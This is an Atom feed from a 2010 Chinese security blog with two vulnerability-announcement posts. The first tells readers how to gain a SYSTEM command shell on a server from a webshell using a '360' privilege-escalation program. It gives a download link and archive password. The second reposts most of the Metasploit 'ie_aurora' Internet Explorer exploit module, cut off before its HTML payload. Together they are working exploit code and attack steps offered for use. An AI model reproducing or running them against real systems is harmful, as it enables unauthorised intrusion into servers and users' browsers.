<?xml version="1.0" encoding="UTF-8"?>
  <feed xmlns="http://www.w3.org/2005/Atom">
  <title type="html"><![CDATA[Friddy's罐子]]></title>
  <subtitle type="html"><![CDATA[Pass my life through a hole ,then the hole became a sky.]]></subtitle>
  <id>http://www.friddy.cn/</id>
  <link rel="alternate" type="text/html" href="http://www.friddy.cn/" /> 
  <link rel="self" type="application/atom+xml" href="http://www.friddy.cn/atom.asp" /> 
  <generator uri="http://www.pjhome.net/" version="2.8">PJBlog3</generator> 
  <updated>2010-02-02T14:40:47+08:00</updated>

  <entry>
	  <title type="html"><![CDATA[360本地提权webshell下测试程序]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=10" label="漏洞公告" /> 
	  <updated>2010-02-02T14:40:47+08:00</updated>
	  <published>2010-02-02T14:40:47+08:00</published>
		  <summary type="html"><![CDATA[测试方法：<br/>在webshell下运行360test.exe<br/><br/>成功后，3389到服务器，按5下shift，得到一个cmd<br/><br/><img src="http://www.friddy.cn/attachments/month_1002/g201022143910.jpg" border="0" alt=""/><br/><br/>PS:由于需要本地权限，对个人用户不会造成影响，危害也不是大范围的。<br/><br/>测试程序：<br/><br/><img src="http://www.friddy.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.friddy.cn/attachments/month_1002/x201022143923.rar" target="_blank">点击下载此文件</a><br/><br/>密码：friddy<br/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.friddy.cn/article.asp?id=118" /> 
	  <id>http://www.friddy.cn/default.asp?id=118</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[Aurora 确定了]]></title>
	  <author>
		 <name>friddy</name>
		 <uri>http://www.friddy.cn/</uri>
		 <email>root@friddy.cn</email>
	  </author>
	  <category term="" scheme="http://www.friddy.cn/default.asp?cateID=10" label="漏洞公告" /> 
	  <updated>2010-01-17T23:05:18+08:00</updated>
	  <published>2010-01-17T23:05:18+08:00</published>
		  <summary type="html"><![CDATA[##看到HDM的这个可以确定了 ，世界又要开始新的一轮疯狂了<br/># $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $ <br/>## <br/><br/>## <br/># This file is part of the Metasploit Framework and may be subject to <br/># redistribution and commercial restrictions. Please see the Metasploit <br/># Framework web site for more information on licensing and terms of use. <br/>#<a href="http://metasploit.com/framework/" target="_blank" rel="external">http://metasploit.com/framework/</a> <br/>## <br/><br/>require &#39;msf/core&#39; <br/><br/>class Metasploit3 &lt; Msf::Exploit::Remote <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Rank = NormalRanking <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include Msf::Exploit::Remote::HttpServer::HTML <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include Msf::Exploit::Remote::BrowserAutopwn <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;autopwn_info({ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:ua_name&nbsp;&nbsp;&nbsp;&nbsp;=&gt; HttpClients::IE, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:ua_minver&nbsp;&nbsp;=&gt; &#34;6.0&#34;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:ua_maxver&nbsp;&nbsp;=&gt; &#34;8.0&#34;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:javascript =&gt; true, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:os_name&nbsp;&nbsp;&nbsp;&nbsp;=&gt; OperatingSystems::WINDOWS, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:vuln_test&nbsp;&nbsp;=&gt; nil, # no way to test without just trying it <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}) <br/><br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;def initialize(info = {}) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;super(up&#100;ate_info(info, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Name&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; &#39;Microsoft Internet Explorer &#34;Aurora&#34; Memory Corruption&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Description&#39;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; %q{ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This module exploits a memory corruption flaw in Internet Explorer. This <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flaw was found in the wild. <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;License&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; MSF_LICENSE, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Author&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;unknown&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;hdm&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Metasploit port <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Version&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; &#39;$Revision: 8136 $&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;References&#39;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;URL&#39;, &#39;<a href="http://www.microsoft.com/technet/security/advisory/979352.mspx" target="_blank" rel="external">http://www.microsoft.com/technet/security/advisory/979352.mspx</a>&#39;], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;URL&#39;, &#39;<a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f" target="_blank" rel="external">http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f</a>&amp;type=js&#39;] <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DefaultOptions&#39; =&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;EXITFUNC&#39; =&gt; &#39;process&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Payload&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Space&#39;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; 1000, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;BadChars&#39; =&gt; &#34;\x00&#34;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Compat&#39;&nbsp;&nbsp; =&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;ConnectionType&#39; =&gt; &#39;-find&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;StackAdjustment&#39; =&gt; -3500, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Platform&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; &#39;win&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Targets&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ &#39;Automatic&#39;, { }], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DisclosureDate&#39; =&gt; &#39;Jan 14 2009&#39;, # wepawet sample <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DefaultTarget&#39;&nbsp;&nbsp;=&gt; 0)) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;def on_request_uri(cli, request) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (request.uri.match(/\.gif/i)) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data = &#34;R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==&#34;.unpack(&#34;m*&#34;)[0] <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;send_response(cli, data, { &#39;Content-Type&#39; =&gt; &#39;image/gif&#39; }) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_memory&nbsp;&nbsp;&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_boom&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_x1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_e1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_e2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_comment&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1); <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_abc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(3); <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_ev1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_ev2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_sp1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_unescape&nbsp;&nbsp;= rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_shellcode = rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_spray&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_start&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_i&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_alpha(rand(100) + 1) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;rand_html&nbsp;&nbsp;&nbsp;&nbsp; = rand_text_english(rand(400) + 500) <br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;html = 